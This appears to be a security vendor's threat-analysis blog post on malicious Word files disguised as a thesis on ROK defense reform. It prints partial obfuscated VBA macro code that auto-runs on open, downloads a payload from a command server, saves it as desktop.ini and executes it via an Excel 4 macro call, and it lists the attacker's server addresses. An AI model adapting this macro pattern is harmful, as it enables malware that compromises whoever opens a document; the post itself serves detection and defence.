The ASEC analysis team has discovered the distribution of malicious Word files disguised as a particular thesis in September. The discovered file is being distributed with the filename of “Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc” and it has malicious macro included. The internal macro code is in a similar form to the following files shared in the past. It thus appears that the same attacker is behind all of them.
- Compensation Claim Form.doc (June 29th, ASEC Blog)
- [** Summer Academic Conference]_Profile Template.doc (July 14th, ASEC Blog)
- A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc (September 15th)
- 2 China’s Foreign Policy and the Prospect of U.S.-China Relations.dotm (September 19th)
- Institute for Far Eastern Studies Naumann Foundation Conference Proposal_Send Only (October 12th)
The Word file discovered to be distributed in September consists of the same text as the actual thesis of <A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories>. Judging from the fact that this thesis has the same filename as ‘05_64_1A Yeonbong Jung Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.pdf’ mentioned in the previous blog post of ‘APT Attacks Using PDF Files, Possibly by North Korea Related Group,’ it is likely that the attacker is creating various forms of malware using the same thesis.
Running the file executes the malicious macro inside, and this macro is the same as the one in the malicious Word document introduced in the following blog post: Malicious Word Document Disguised as Profile Template File for Summer Academic Conference Being Distributed The following is the macro code that exists in the recently-discovered Word file ‘A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc’.
Dim qazwsx As Integer
<em>Function</em> sfjksfdgasdfhefgh(data)
On Error Resume Next
sfjksfdgasdfhefgh = afghhha(data)
End <em>Function</em>
<omitted>
Sub AutoOpen()
On Error Resume Next
asfwqfasfsdafas
qazwsx = 0
ujmikl
End Sub
<em>Function</em> ujmikl()
On Error Resume Next
If (qazwsx = 0) Then
<omitted>
ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
Set wob = CreateObject("wscript.shell")
drl = sfjksfdgasdfhefgh("[C2 address encoded with base64]")
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", drl, False
WinHttpReq.send
If WinHttpReq.Status = 200 Then
gjhmksfghsdfgs ini, sfjksfdgasdfhefgh(WinHttpReq.responseText)
Set ExcelApp = CreateObject("Excel.Application")
str9 = sfjksfdgasdfhefgh("Y2FsbCgia2VybmVsMzIiLCAiV2luRXhlYyIsICJKRkoiLCAid3NjcmlwdCAvL2U6dmJzY3JpcHQgLy9iICIi") // call("kernel32", "WinExec", "JFJ", "wscript //e:vbscript //b ""
str11 = sfjksfdgasdfhefgh("IiIiLCA1KQ")
str11 = Left$(str11, InStr(str11, vbNullChar) - 1)
ini = Replace(ini, "\", "\\")
cmd = str9 + ini + str11
api = ExcelApp.ExecuteExcel4Macro(cmd)
Sleep 2000
DeleteFileA ini
End If
qazwsx = 1
End If
End <em>Function</em>
A C2 address encoded with Base64 exists within the macro code. The ‘A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc’ file connects to hxxp://n4028chu.mywebcommunity.org/d.php and saves the received data to %APPDATA%\desktop.ini file, then runs it.
This type of malware is being distributed with various filenames as shown below.
- 2 China’s Foreign Policy and the Prospect of U.S.-China Relations.dotm (September 19th)
- Institute for Far Eastern Studies Naumann Foundation Conference Proposal_Send Only (October 12th)
Both files above contain the same malicious macro, and as shown below, there is a Word file with an additional code where the malicious behavior can be operated upon entering a certain key into the macro code of ‘A Critical Analysis on ROK Defense Reform Utilizing Evolving Management Theories.doc.’ Besides the additional code, the variable/function names are the same.
Dim qazwsx As Integer
<em>Function</em> sfjksfdgasdfhefgh(data)
On Error Resume Next
sfjksfdgasdfhefgh = afghhha(data)
End <em>Function</em>
<omitted>
<em>Function</em> ujmikl()
On Error Resume Next
If (qazwsx = 0) Then
<omitted>
ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
Set wob = CreateObject("wscript.shell")
drl = sfjksfdgasdfhefgh("[C2 address encoded with base64]")
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", drl, False
WinHttpReq.send
<omitted>
Sub FLL()
Selection.TypeText Text:="a"
ujmikl
End Sub
Sub G9W()
Selection.TypeText Text:="b"
ujmikl
End Sub
Sub GEA()
Selection.TypeText Text:="c"
ujmikl
End Sub
<omitted>The following are the C2 addresses found in malicious Word files with identical macro included.
- hxxp://0knw2300.mypressonline[.]com/d.php
- hxxp://hanjutour.atwebpages[.]com/d.php
- hxxp://n4028chu.atwebpages[.]com/d.php
- hxxp://23000knw.mypressonline[.]com/d.php
As shown above, attacks using malicious Word files are continually happening. As such types of malicious files contain the actual text of the thesis, users may not recognize that these files are malicious. Therefore, users need to take extra caution and refrain from executing macros and files from unknown sources.
AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:
[File Detection]
- Downloader/DOC.Agent
- Downloader/DOC.Generic.S1677
[IOC]
- 5eb09dd7aafdd5af5a8396497f99e0e7
- hxxp://n4028chu.mywebcommunity.org/d.php
- hxxp://0knw2300.mypressonline[.]com/d.php
- hxxp://hanjutour.atwebpages[.]com/d.php
- hxxp://n4028chu.atwebpages[.]com/d.php
- hxxp://23000knw.mypressonline[.]com/d.php
[Related Post]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information
[…] The way the executed VBS code communicates with the attacker’s C&C server is similar to the method introduced in the previous ASEC blog post (APT Attacks Using Malicious Word File of a Particular Thesis). […]